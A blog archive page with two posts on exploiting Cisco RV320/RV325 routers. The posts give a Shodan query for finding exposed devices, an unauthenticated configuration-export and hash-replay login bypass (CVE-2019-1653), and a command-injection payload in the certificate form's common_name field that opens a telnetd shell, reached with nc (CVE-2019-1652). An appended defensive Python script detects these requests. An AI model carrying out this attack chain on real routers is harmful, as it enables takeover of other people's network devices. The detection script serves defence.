Posts

Showing posts from June, 2021

CVE-2019-1652 Cisco RV320/RV325 Router Command Injection Vulnerability

Steps

1. Bypass authentication and log in to the Cisco RV320 or RV325 router by exploiting CVE-2019-1653, described in the previous post.
2. Go to the Certificate Management > Certificate Generator page.
3. Fill in any junk values in the form.
4. Turn on intercept in BurpSuite and click on the Save button.
5. In the BurpSuite interceptor, replace the common_name parameter value with the URL-encoded command that starts a command shell on the router using the telnetd service. That is, replace the common_name value with the URL-encoded string of the following command:

a'$(telnetd -l /bin/sh -p 1234)'b

The URL-encoded string corresponding to the above command is:

a%27%24%28telnetd%20-l%20%2Fbin%2Fsh%20-p%201234%29%27b

6. The router will now start listening on port 1234. Connect to the shell using the following command:

nc -n ipAddress 1234

CVE-2019-1653 Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability

Introduction

Vulnerability CVE-2019-1653 allows export of the configuration file from vulnerable Cisco RV320 and RV325 series routers. This can be exploited to gain administrative access to the router.

Device Identification

Identify the vulnerable devices using the Shodan query: http.favicon.hash:-299287097 Apache

Configuration Export

Export the router configuration file by appending /cgi-bin/config.exp to the IP address of the router.

Authentication Bypass

1. Open the configuration file and get the username and password hash.
2. Start Burpsuite. In the Proxy tab, click on Open Browser to open the Burp embedded browser.
3. Open the router web management URL in the Burp embedded browser.
4. Turn on intercept in the Burp proxy.
5. Enter the username as in the configuration file and any password.
6. In the Burp proxy Intercept, replace the value of the password= parameter with the hash from the configuration file.
7. Forward the request and turn off the intercept to log in to the router.

Reference: https://www.redteam-pentesting.de/en/advisor
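As an added defender-side example (not code from either post above), the following Python checks a reverse-proxy or WAF log that records request bodies for the two request patterns these posts describe: a fetch of /cgi-bin/config.exp, and a certificate-generator POST whose common_name field decodes to shell metacharacters. The tab-separated log format, the client addresses and the /certificate_generator path are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Path used for the unauthenticated configuration export (CVE-2019-1653).
CONFIG_EXPORT_PATH = "/cgi-bin/config.exp"

# Characters that never belong in a legitimate certificate common name but
# are needed to break out of the shell command the router builds from it.
SHELL_META = re.compile(r"[`'\";|&]|\$\(")


def inspect_request(method, path, body=""):
    """Return alert strings for one router HTTP request.

    body is the raw form body; it is only available from a proxy or WAF log
    that records bodies, not from a plain web-server access log.
    """
    alerts = []
    if path.split("?", 1)[0] == CONFIG_EXPORT_PATH:
        alerts.append("config export requested (CVE-2019-1653)")
    if method.upper() == "POST" and body:
        # parse_qs percent-decodes, so %24%28 is seen as "$(".
        fields = parse_qs(body, keep_blank_values=True)
        if any(SHELL_META.search(v) for v in fields.get("common_name", [])):
            alerts.append("shell metacharacters in common_name (CVE-2019-1652)")
    return alerts


def scan_log(lines):
    """Map client address -> alerts for tab-separated 'client\\tmethod\\tpath\\tbody' lines."""
    findings = {}
    for line in lines:
        client, method, path, body = line.rstrip("\n").split("\t", 3)
        for alert in inspect_request(method, path, body):
            findings.setdefault(client, []).append(alert)
    return findings


# Constructed sample log; /certificate_generator is a placeholder path.
SAMPLE_LOG = [
    "198.51.100.7\tGET\t/cgi-bin/config.exp\t",
    "198.51.100.7\tPOST\t/certificate_generator\t"
    "common_name=a%27%24%28telnetd%20-l%20%2Fbin%2Fsh%20-p%201234%29%27b&country=US",
    "203.0.113.5\tPOST\t/certificate_generator\tcommon_name=vpn.example.net&country=US",
    "203.0.113.5\tGET\t/login.htm\t",
]

if __name__ == "__main__":
    for client, alerts in scan_log(SAMPLE_LOG).items():
        print(client, alerts)
```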